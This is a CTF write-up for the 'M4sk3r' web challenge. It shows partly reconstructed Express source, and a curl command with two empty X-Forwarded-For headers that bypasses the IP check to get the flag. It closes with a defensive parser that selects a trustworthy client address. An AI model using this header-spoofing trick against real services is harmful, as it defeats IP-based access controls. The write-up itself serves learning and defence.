Incognito wtfCTF 2021: M4sk3r


Category: Web


150 points

Can you Mask it? M4sk3r

Author: Hackerbone


Under the challenge URL there's a simple web page with a flag checker.


I couldn't find anything, so I gave dirb a chance. After running for a while it found a hint ;-)

+ (CODE:200|SIZE:1644)

The source code of the app is below.

```javascript
const express = require('express');
const app = express();
const port = process.env.PORT;
const path = require('path');
const fs = require('fs');

// Body parser for the flag-checker form. Only `extended: true` survived in the
// copied source; the surrounding app.use(...) call is reconstructed.
app.use(express.urlencoded({
  extended: true
}));

// The app reads its own source into SOURCE so it can serve it later.
var SOURCE = '';
fs.readFile(path.dirname(__filename + '/index.js'), 'utf-8', (err, data) => {
  SOURCE = data;
});

const first = process.env.FIRST
const second = process.env.SECOND

const FLAG = process.env.FLAG
const temp = 'wtfCTF{sc4mm3d_4g41n}'

app.get('/getFlag', (req, res) => {
  if ('x-forwarded-for' in req.headers) {
    // I believe in 0,2,-1
    var InternetProtocols = req.headers['x-forwarded-for'].split(', ')
    if (!InternetProtocols) {
      return res.status(400).send("<h4>Visible confusion</h4>");
    }
    if ((InternetProtocols[first] !== InternetProtocols[second]) || (InternetProtocols[first] !== InternetProtocols[InternetProtocols.length - 1])) {
      return res.status(400).send("<h4>The indices I wanted to check don't match, no flag for you :p</h4>");
    }
    var ip = InternetProtocols[first].toString();
    if (ip != "") {
      return res.status(401).send("Nah, incorrect ip");
    }
    return res.send("Damn, nice one you get to enjoy this : <h4>" + FLAG + "</h4>");
  }
  // The response for requests without the header is not in the copied source;
  // this line is reconstructed so the handler always answers.
  res.status(400).end();
});

app.get('/', (req, res) => {
  res.sendFile(path.join(__dirname, './', 'index.html'))
});

// Handler body missing in the copied source; serving SOURCE is the evident intent.
app.get('/source', (req, res) => {
  res.send(SOURCE)
});

// The `app.<method>(` prefix was lost in the copied source; POST is assumed,
// since the route reads a form field from req.body.
app.post('/checkFlag', (req, res) => {
  var inpFlag = req.body.flagInput;

  if (inpFlag === FLAG) {
    return res.send("Flag Is Correct! GG");
  }
  res.send("Flag Is wrong");
});

app.listen(port); // reconstructed; the listen call was not in the copied source
```


The /getFlag endpoint seems to be the target for exploitation. It checks the X-Forwarded-For header of the request. After a couple of attempts I managed to match all the conditions and get the flag.

curl -H 'X-Forwarded-For:, <REDACTED MY IP ADDRESS>,' -H 'X-Forwarded-For:'
Damn, nice one you get to enjoy this : <h4>wtfCTF{just_4n0th3r_h34d3r}

The reason it works is that Heroku takes the first X-Forwarded-For header, appends your IP address to it, and then appends the second X-Forwarded-For header; the header combined that way is what finally reaches the application. With both headers empty the app therefore receives `, <your IP>, `, which `split(', ')` turns into `["", "<your IP>", ""]`, so the entries at indices 0, 2 and -1 are all the empty string and every check passes.

I’ve learned the above during one of the previous CTFs…
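The following is an added example, not code from the challenge or the writeup. It models the header-combining behaviour described above (a proxy that joins the client's first X-Forwarded-For value, the observed peer address and the client's second value with `", "`), shows that the challenge's index check then only ever compares client-controlled empty entries, and sets a defensive parser beside it that picks the client address by counting trusted hops from the right and fails closed on empty or non-IPv4 entries. The proxy model and the sample address 203.0.113.7 (a documentation range) are constructed assumptions.

```javascript
// Added example: proxy model, the challenge's check, and a defensive parser.

// Model of the proxy described in the writeup (assumption, not Heroku's
// documented algorithm): first client value, then the peer IP seen on the
// socket, then any further client values, all joined with ", ".
function mergeForwardedFor(clientHeaderValues, peerIp) {
  const parts = [];
  if (clientHeaderValues.length > 0) parts.push(clientHeaderValues[0]);
  parts.push(peerIp);
  for (const v of clientHeaderValues.slice(1)) parts.push(v);
  return parts.join(', ');
}

// The challenge's rule, as reconstructed from its source: the entries at
// FIRST, SECOND and the last index must be identical and equal to "".
// Every one of those positions is filled from the client's own headers.
function challengeAccepts(xff, first, second) {
  const ips = xff.split(', ');
  if (ips[first] !== ips[second]) return false;
  if (ips[first] !== ips[ips.length - 1]) return false;
  return ips[first] === '';
}

// Defensive selection. A forwarded-for list is trustworthy only from the
// right, where each trusted proxy appended exactly one entry; with N trusted
// proxies the client address is the N-th entry from the right. Anything
// further left is client-supplied and ignored. Empty or non-IPv4 entries are
// rejected rather than compared, so a request that arrives with stray
// separators fails closed instead of matching an empty string.
const IPV4 = /^(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}$/;

function clientIpFromForwardedFor(xff, trustedHops) {
  const entries = xff.split(',').map((s) => s.trim());
  if (trustedHops < 1 || entries.length < trustedHops) return null;
  const candidate = entries[entries.length - trustedHops];
  return IPV4.test(candidate) ? candidate : null;
}

// Constructed scenarios: two empty headers (the writeup's trick), no header,
// and a client that spoofs one address in front of its real one.
const PEER = '203.0.113.7';
const twoEmpty = mergeForwardedFor(['', ''], PEER);
const plain = mergeForwardedFor([], PEER);
const spoofed = mergeForwardedFor(['10.0.0.1'], PEER);

console.log(JSON.stringify(twoEmpty), 'accepted by challenge:', challengeAccepts(twoEmpty, 0, 2));
console.log(JSON.stringify(plain), 'accepted by challenge:', challengeAccepts(plain, 0, 2));
console.log('defensive parser, two empty headers ->', clientIpFromForwardedFor(twoEmpty, 1));
console.log('defensive parser, spoofed prefix    ->', clientIpFromForwardedFor(spoofed, 1));
```

The two-empty-headers case is the instructive one for a defender: the rightmost entry is not the proxy's contribution but the client's second header, so even the standard count-from-the-right rule returns an empty string there. Rejecting anything that is not a syntactically valid address is what makes the parser fail closed; Express's `trust proxy` setting with `req.ip` applies the same right-to-left counting, and the empty-entry check still belongs in front of any decision based on the result.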
